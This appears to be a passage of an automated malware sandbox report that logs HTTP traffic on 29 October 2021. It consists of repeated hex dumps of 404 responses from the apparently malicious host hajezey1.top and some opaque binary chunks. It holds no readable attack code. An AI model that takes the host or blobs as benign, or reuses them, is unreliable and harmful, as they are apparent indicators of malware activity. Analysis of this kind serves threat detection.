05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 bd 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 95 09 09 a8 1f 13 30 7b 32 cc c9 e1 ad c3 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 98 3f d8 2c eb 53 43 a0 0c 97 e4 22 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c 7f e2 46 aa 8f 8c f5 cf 9b 2b 25 9b f6 ba c9 1b b0 1c 67 74 d2 ff 95 87 cd 2b 80 78 51 a1 a2 8f 2c df d2 1c e0 32 02 50 08 08 d8 e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1f 27 f4 d2 af 34 91 b4 b9 41 8f 20 59 55 11 5c 7c 3b 66 ab 49 11 a0 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 bd 28 c6 8a 44 d8 06 0e 45 c7 1e 7d 6f fb e0 04 89 f9 d4 57 80 90 70 89 ec e4 4a 6b b6 f2 a2 22 48 52 df 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 23 36 55 96 da 19 d1 3a 2d b2 4e 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 71 87 4a 04 38 6d 72 14 2c d0 e8 b1 14 65 7c 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 a2 4c 64 cd 25 5c 8d b7 bf 2e 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 c5 d0 b8 be 34 56 9b 46 76 99 86 11 00 83 32 42 52 f7 c2 ae 64 0f 95 36 e1 48 52 67 25 50 b8 81 f6 bc 81 de bb 6e 6a 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 bc a6 62 4a 08 5d f6 b3 06 2d 1a c0 5e f3 7c bb a7 fd d4 98 21 17 da 9a 2d 35 23 7d f5 b2 68 60 b8 10 31 fa ed ad 67 e1 e1 bd 84 f3 8c 40 b6 f0 90 4f a1 21 71 ae 61 2e 7a b1 76 af ce c6 83 41 66 30 ae a9 c8 d0 7e 33 3a 64 67 0b bf 77 6a 66 21 0e 8a ef 28 1d 41 81 d4 b6 78 8e 18 d3 e4 9e 0c 7b d6 6c 02 2f 27 76 d7 9b 4e 20 ba f5 be 08 85 fd 89 aa 41 b7 28 8f f4 d5 06 78 5c 9b b8 08 c0 e5 5c c5 17 00 f3 b8 d0 a3 39 a9 b2 13 20 1d 06 1a 1b e1 ea f0 6c 8d e9 c7 d2 83 6f d5 c5 3b ec cf 8b 40 75 02 99 e0 03 f4 c3 05 cb 99 d3 23 2a 71 c7 a5 d9 62 77 ca 08 8f bd c8 11 61 a1 99 9e 5f e3 0f 4e 8a d0 23 9d 43 8e 7e 14 0e b9 2c 58 99 f7 6d 08 d8 fd f7 cb ab 42 66 fb 05 6d 77 5e 8e b7 4a 84 99 fb 42 17 7d bd 91 94 13 85 f3 bd b3 3b 1c 67 c7 22 e7 19 8e 53 c0 b2 21 ab 63 95 22 89 ac 1f 13 34 5e 12 59 b3 52 34 eb e0 0f 25 b8 a3 c1 1d d7 cb ab 14 62 f3 3b 1f 70 da be 91 b3 bf de 2c eb 57 66 80 fe 9d 11 b0 5e fe 14 f9 20 e4 89 93 64 4b 70 94 ea 13 6b e6 e8 80 0b 3d f2 9d 65 09 de fb 18 e1 98 ea 30 e3 dc dd 6a db 82 96 dd
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c 1d 16 4d aa 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 07 74 d2 87 9a 87 cd 2b 80 78 51 a1 a2 8f 3c 65 dd 1c e0 32 02 50 08 a8 da e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1d 27 f4 d2 af 34 91 b4 b9 21 80 20 59 55 11 5c 92 86 64 ab 49 11 80 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 85 92 c9 8a 5c d8 06 0e 45 27 11 7d 87 f8 e0 04 89 f9 d4 57 80 90 70 89 ec 9c 48 6b 0e e1 a2 22 48 f2 d0 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 d3 4f 5a 96 da 19 d1 3a 2d ca 41 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 99 84 4a 04 38 8d 7d 14 2c d0 e8 b1 14 1d 73 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 02 43 64 cd 25 5c 8d b7 d7 21 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 f5 6a b7 be 34 56 9b 46 76 99 86 11 00 83 32 42 ea 6f cf ae 04 5d 94 36 e1 48 50 67 35 50 b8 81 be f0 80 de 5b 46 6a 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 a7 85 62 4a 52 7d 54 7a 08 6c 39 c0 5e f3 5c 19 6d 63 95 be 07 3d da 9a 3e 05 22 7d e6 b2 68 60 bd 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 47 4e a1 21 84 88 4b 2e 69 81 77 af dd c6 83 41 df 30 ae b8 e8 21 10 a0 57 6e 61 87 bd 77 6a 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 52 d3 e4 9e 4e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 3d 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 9b 09 09 a8 00 13 30 7b 88 cc c9 e1 a3 c3 e5 0f 25 93 23 c4 a9 d7 cf 8e 3d 39 dc 46 ba 58 dc be b0 98 3f d8 94 eb 53 43 a1 0c 97 e4 6e 76 f9 14 34 0b 64 82 b2 64 4f 55 e0 ca 5e c3 bd c0 88 0b 54 d9 1d 69 7a de ff 3d e1 03 70 2e 1f f4 d4 6a a9 a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 